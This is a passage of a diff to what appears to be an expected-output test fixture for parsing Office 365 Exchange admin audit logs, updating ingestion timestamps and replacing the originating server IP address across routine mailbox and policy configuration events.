@@ -279,8 +279,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177564200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852972800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -300,12 +300,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -335,7 +335,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -347,8 +347,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177567200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852977800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -368,12 +368,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -404,7 +404,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -416,8 +416,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177570100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852981100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -437,12 +437,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -474,7 +474,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -486,8 +486,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177573100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852985900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -507,12 +507,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -542,7 +542,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -554,8 +554,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177576100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.852991Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -575,12 +575,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -623,7 +623,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -635,8 +635,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177579400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.852996300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"b9f4dff2-c7f5-41eb-eae8-08d7ac0f3492\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -656,12 +656,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -704,7 +704,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -716,8 +716,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177582300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853002Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -737,12 +737,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -773,7 +773,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -785,8 +785,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177585200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853006100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -806,12 +806,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -854,7 +854,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -866,8 +866,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177588300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 